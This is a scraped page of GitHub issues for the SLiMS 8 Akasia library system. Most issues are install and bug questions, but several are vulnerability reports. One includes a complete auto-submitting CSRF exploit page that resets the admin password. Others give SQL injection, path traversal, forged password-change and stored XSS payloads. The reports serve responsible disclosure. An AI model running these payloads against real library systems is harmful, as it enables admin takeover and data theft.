slims / slims8_akasia Goto Github PK
View Code? Open in Web Editor NEWSLiMS 8 Akasia official source code repository
License: GNU General Public License v3.0
SLiMS 8 Akasia official source code repository
License: GNU General Public License v3.0
Dear, slims team!
Thank you for this awesome application.
In my institution, we use nginx instead of apache. Could you give me an example of server block to install slims on nginx web server?
Halo,
Saya menemukan bug reflected pada module Circulation di parameter keywords. Melalui bug ini dapat berdampak antara lain,
Proof of Concepts
Halo,
Saya menemukan bug reflected pada module Bibliography di parameter keywords. Melalui bug ini dapat berdampak antara lain,
Proof of Concepts
setelah berkutat agak lama, saya akhirnya berhasil install senayan akasia diserver dengan spesifikasi sbb
os centos 7
webserver nginx
php versi 7.2.x
database mariadb
di awal saya mengalami kendala dengan gettext yg tidak lazim.
umumnya gettext menggunakan _('foo') bukan __('foo'), informasi yg muncul saat instalasi pun hanya error 500
saya coba cari tulisan mengenai problem ini dan tidak ada satu informasi yg memuaskan.
akhirnya setelah saya coba menggunakan cli, tutuk cerah mulai muncul
rupanya sistem ini membutuhkan php-mbstring, dan itu tidak ada dalam peringatan saat instalasi.
Mohon, requirement dituliskan dalam readme sehingga memudahkan instalasi di server yg tidak menggunakan paket instalasi seoerti xampp.
When adding a new item to a bibliography with the Add item Button, I get
Invalid Submission Token
when I click update. The item is still added though.
Hallo guys. dev senayan
mau tanya , panduan pembuatan module tambahan (custom) untuk slims 8 ada gak ?
Kak, tolong sulusinya =
"Error requesting page : /admin/modules/sms_gateway/index.php?ajaxload=1". Sepertinya pada penyesuain path daemon.bat bagian letak PHP...
Tolong pencerahannya...
halo, bagai mana cara menambah super user? seperti ID awal saat installasi. karena di instansi pustaka kami akan ada 2 administrator yang bertanggung jawab untuk mengelola aplikasi ini. dan masing2 administrator harus punya 1 ID super user.
Halo,
Saya menemukan bug reflected pada module Circulation di parameter keywords. Melalui bug ini dapat berdampak antara lain,
Proof of Concepts
if you define fields in member_custom_fields.inc.php and create them in the member_custom table, you get an error message when saving a member: "Unknown column 'customfield1' in 'field list'".
If you create the fields in the member table it works. But this is not the intended way to do it, is it?
Thumbnail Cover Promote Book pada halaman Home bisa tampil, namun pada hasil pencarian dan detail book cover tidak bisa tampil. Kendala ini muncul ketika SLiMS dipasang di hosting.
Saya sudah mencoba melakukan modifikasi pada file .htaccess dengan menambahkan kode berikut:
# Modifikasi ketika gambar cover tidak bisa tampil
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
tapi OPAC tetap tidak bisa menampilkan thumbnail cover..
Mohon pencerahannya...
saya rasa template publik lightweight ini template yang modern dan ringan, namun pada fungsi visitor countnya tidak berfungsi, setelah saya teliti ternyata ada masa di bagian javascriptnya pada meta.php
menganti dan menambahkan skrip ini :
Menjadi
<script src="/default/js/jquery.min.js"></script> <script src="gui.js"></script>pada baris akhir di file meta.php
There are multiple issues with editing and deleting items from the "RDA Media Type" and "RDA Carrier Type" in the master_file module
Masalah ini sudah ada sejak slims cendana.
Masalahnya terdapat pada sysconfig.inc.php
pada baris ke 117.
$temp_senayan_web_root_dir = preg_replace('@admin.*@i', '', dirname(@$_SERVER['PHP_SELF']));
Masalah tersebut muncul dari dirname
di windows, yang memberikan backslash bukannya forwardslash. Kode tersebut bisa dirubah menjadi:
$temp_senayan_web_root_dir = preg_replace('@admin.*@i', '', str_replace('\\', '/', dirname(@$_SERVER['PHP_SELF'])));
Apakah ada EER Diagram untuk database slims8_akasia ?
saya ingin melihat relasi antar table agar lebih mudah memahami. Terimakasih
Bagaimana cara menerapkan auto increment pada kode eksemplar dan kode inventaris pada slims akasia?
Terima kasih
While updating the translations I noticed that the citation popup for titles whose author name is not in the format "lastname, firstname" only displays the lastname, nothing else. For me it doesn't matter, because I don't need that feature, but maybe you want to fix it anyway.
The problematic code is in lib/contents/cite.inc.php:
foreach ($authors as $auth) {
// invert first author name if it is not inverted
if ($a == 0 && stripos($auth['author_name'], ',', 2) === false) {
$last_name = strrpos($auth['author_name'], ' ') + 1;
$name = substr($auth['author_name'], $last_name);
die($name);
$author_list[] = $name;
} else {
$author_list[] = $auth['author_name'];
}
$last_author = $auth['author_name'];
$a++;
}
The problem is the "die()", but the rest of the code also looks unfinished, because the intention seems to be to invert the first and the last name, but the code never extracts the first name. Also the variable $last_author is never used and more complicated cases like authors with only a first or only a last name or authors with multiple last names are not addressed. Maybe it's better to remove the code to invert first and last name, because it can't be programmed in a way that gives correct results for authors with multiple last names while also working for authors with multiple first names.
Apakah API di slims8_akasia sudah bisa digunakan? Transaksi apa saja yang sudah bisa dilakukan melalui API?
I've managed to install fresh slims with this configuration:
When I try to create new librarian on system - Librarian & System Users - add new user. After I filled up all the field and press save, the browser seems reloading the page but nothing else happend. I checked on the database, no user been added.
This behaviour also happend on User Group page.
Any other suggestion on this matters?
Halo,
Saya menemukan security bug pada fitur update admin, pada fitur tersebut sudah mempunyai CSRF protections namun dapat di bypass.
Melalui bug ini dan kecerobohan pengguna (admin level) dapat dimanfaatkan oleh attacker untuk mengambil alih akun admin secara penuh.
Proof of concept
Ketika melakukan update data admin sudah terdapat CSRF token.
Namun sayangnya tidak ada pengecekan pada sisi server side untuk mengecek keberadaan parameter csrf_token. Parameter csrf_token dapat dihapus ketika proses POST data, sehingga dapat terbypass protectionnya. Berikut ini merupakan script exploit csrf yang dapat digunakan untuk mengeksploitasi celah ini
<html>
<body onload="submitRequest()">
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/192.168.100.18:81\/slims\/admin\/modules\/system\/app_user.php?changecurrent=true&action=detail&ajaxload=1", true);
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------863798609");
xhr.withCredentials = true;
var body = "----------863798609\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"mainForm\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"userName\"\r\n" +
"\r\n" +
"admin\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"realName\"\r\n" +
"\r\n" +
"admin\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"userType\"\r\n" +
"\r\n" +
"1\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"eMail\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[fb]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[tw]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[li]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[rd]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[pn]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[gp]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[yt]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[bl]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"social[ym]\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"base64picstring\"\r\n" +
"\r\n" +
"\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"passwd1\"\r\n" +
"\r\n" +
"faisal\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"passwd2\"\r\n" +
"\r\n" +
"faisal\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"saveData\"\r\n" +
"\r\n" +
"Update\r\n" +
"----------863798609\r\n" +
"Content-Disposition: form-data; name=\"updateRecordID\"\r\n" +
"\r\n" +
"1\r\n" +
"----------863798609--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
</body>
</html>
Simpan script exploit diatas sebagai html file.
Kirimkan exploit.html kepada korban yang sedang login pada slims miliknya.
Berikut ini merupakan respon dari hasil perubahan data admin.
Setelah berhasil, attacker dapat mengambil alih akun tersebut dengan login ke sistem slims korban menggunakan
username : admin
password : faisal
bagaimana cara menambahkan koneksi 2 database di slims..
Hi, I have found some critical bugs in Slims8 Akasia 8.3.1 (latest version).
First, There is a sql injection bug in this url:
$table_name = $dbs->escape_string(trim($_POST['tableName']));
<--striped-->
// append table name
$sql_string .= " FROM $table_name ";
if ($criteria) { $sql_string .= " WHERE $criteria LIMIT $limit"; }
// send query to database
$query = $dbs->query($sql_string);
You have escaped the tableName
string. But actually it just appends backslash \
before '
, "
, or \
. Reference from PHP mysql_real_escape_string
So if my POST variable tableName
will trigger sql injection if not contains these chars.
Example: tableName = user where 1=0 union select version()--
And also
$table_fields = trim($_POST['tableFields']);
<--striped-->
// explode table fields data
$fields = str_replace(':', ', ', $table_fields);
// set where criteria
$criteria = '';
foreach (explode(':', $table_fields) as $field) {
$criteria .= " $field LIKE '%$keywords%' OR";
}
// remove the last OR
$criteria = substr_replace($criteria, '', -2);
$sql_string = "SELECT $fields ";
Variable tableFields
does not sanitize for sql query yet. So it'll trigger injection like this
These 2 urls have the same problems
This bug is excutable by everyone who has librarian role (single).
The title on bibliography can't be updated if you edited from item list
Halo,
Saya menemukan bug reflected pada module Circulation di parameter keywords. Melalui bug ini dapat berdampak antara lain,
Proof of Concepts
Halo,
Saya menemukan bug reflected pada module Circulation di parameter keywords. Melalui bug ini dapat berdampak antara lain,
Proof of Concepts
The image upload is broken, i tried in several browsers and what it does is doubles the ".png" or ".jpeg" then it wont display in the OPAC. So i tried manually modifying the database and the issue still arises. Im not familiar enough with the project to find the issue. But i think it has to do with the way it is stored. I have a feeling it is being stored in the mysql database, not as a file on the folder it is installed on since i dont see any file generation there.
Also id like to see a added feature of file look up through a source like Library of congress or world cat. Something like that.
bagaimana ingin menunjukkan type of collection di dalam opac?
mungkin sebaris dalam kotak di ruangan availibility
sekian, mohon mencadang..
Tampilan cetak kartu anggota berantakan ketika sistem diubah ke bahasa indonesia.
sedangkan ketika menggunakan bahasa inggris normal.
slim akasia
Hi, there is an abitrary file read bug in
if(isset($_GET['url']) && !empty($_GET['url'])) {
$file_path = HELP.'/'.$sysconf['default_lang'].'/'.$_GET['url'];
if(!file_exists($file_path)) {
echo __('File Not Found');
} else {
//Convert Markdown to HTML
$markdown_text = file_get_contents($file_path); //bibliography/add-new-bibliography.md
We can travel directory path and use abitrary filename in $_GET['url']
.
So attacker can read any file (include source code, config) in the system.
PoC
This bug is excutable by everyone who has librarian role (single).
What is the best way to translate Strings which are in .js files?
So far I found the following untranslated Strings:
For the first one I wrote a patch that translates the String in PHP and puts it into the HTML where the JS can read it later. But this is not a very clean solution and not so easy for other Strings(e.g. the day and month names in the calendar)
In Change User Profile function, there is no Old password
to confirm change user password, and also no CSRF Token
to protect CSRF malicious request. Reference Owasp.
So when the admin user access to malicious web, it will trigger to automatically change admin password to attacker's password.
Example request:
userName=admin
&realName=Admin
&userType=1
&eMail=
&social[fb]=
&social[tw]=
&social[li]=
&social[rd]=
&social[pn]=
&social[gp]=
&social[yt]=
&social[bl]=
&social[ym]=
&image=
&base64picstring=
&passwd1=trichimtrich
&passwd2=trichimtrich
&saveData=Update
&updateRecordID=1
This will change admin password
to trichimtrich
And also, there is a stored XSS in here too. All the field realName
, eMail
, social[xx]
have the same problem.
Sample request:
&realName=Admin" autofocus onfocus="alert(1)
Attacker can trigger admin to execute abitrary javascript to do anything.
When going through in install steps described here http://slims.web.id/goslims/?wpdmpro=dokumentasi-resmi-slims-bahasa-inggris , I cannot load the senayan.sql because of an error here https://github.com/slims/slims8_akasia/blob/master/install/senayan.sql#L12-L18 .
> mysql -u root senayandb < install/senayan.sql
ERROR 1067 (42000) at line 12: Invalid default value for 'backup_time'
I'm trying to install on macOS, with mysql version:
> mysql --version
mysql Ver 14.14 Distrib 5.7.15, for osx10.12 (x86_64)
Is there a dependency on a specific version of mysql? Also, is there a list of dependencies with versions?
Thanks very much for your help and development on this project :)
Terima kasih!
Slims akasia ada plugin buat penghitungan pengunjung website ny gak ya??
Bisa kah slims ini untuk insert flipbook??
Saya mendapatkan pesan ini ketika ingin mengimport data csv member
Error requesting page : /admin/modules/membership/import.php?ajaxload=1undefined
dan ada pesan lain yang muncul dengan redaksi yang mirip ketika membuka beberapa menu, seperti bibliografi dan lainnya
Error requesting page : /admin/modules/system/sys_log.php?ajaxload=1undefined
sebelumnya saya mengimport data bibliografi sekitar 3000 data. berhasil, dan sempet muncul datanya. tapi setelah beberapa kadang muncul pesan yang ke 2 dan tidak tampil data bukunya
Mohon bantuannya, Terimakasih tim SLIMS!
barcode problem jika nomor item pakai space char and slash char.
Dahulu pernah difix ada di dicarve/slims8_akasia@24588ae
Halo, saya barusan membuat periode peminjaman dari 14 hari menjadi 21 hari. Namun meski saya ubah, dan bahkan saya coba hapus aturan peminjaman yang lama2, tetap saja tanggal harus kembali yang muncul 14 hari dari tanggal peminjaman. Tanggal harus kembali harus diubah secara manual agar menjadi 21 hari. Kira2 kenapa ya?
saya mencoba untuk mencetak kartu anggota, tetapi muncul jendela pop up
"Object not found!
The requested URL was not found on this server. The link on the referring page seems to be wrong or outdated. Please inform the author of that page about the error.
If you think this is a server error, please contact the webmaster.
Error 404
localhost
Apache/2.4.17 (Win32) OpenSSL/1.0.2d PHP/5.5.30 "
itu kenapa ya?? saya kurang paham. mohon bantuannya
please do make check, concerning loan rules attached to circulation. because we have a concern here. when someone make a loan rules then make a lend based on that loan rules, that loan rules bind to that person. but when that someone erase that particular loan rules, all data related to erased loan rules, will be gone to. and the admin will be confused.
please do make check.
Menu toggle pada versi ini template default hilang.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.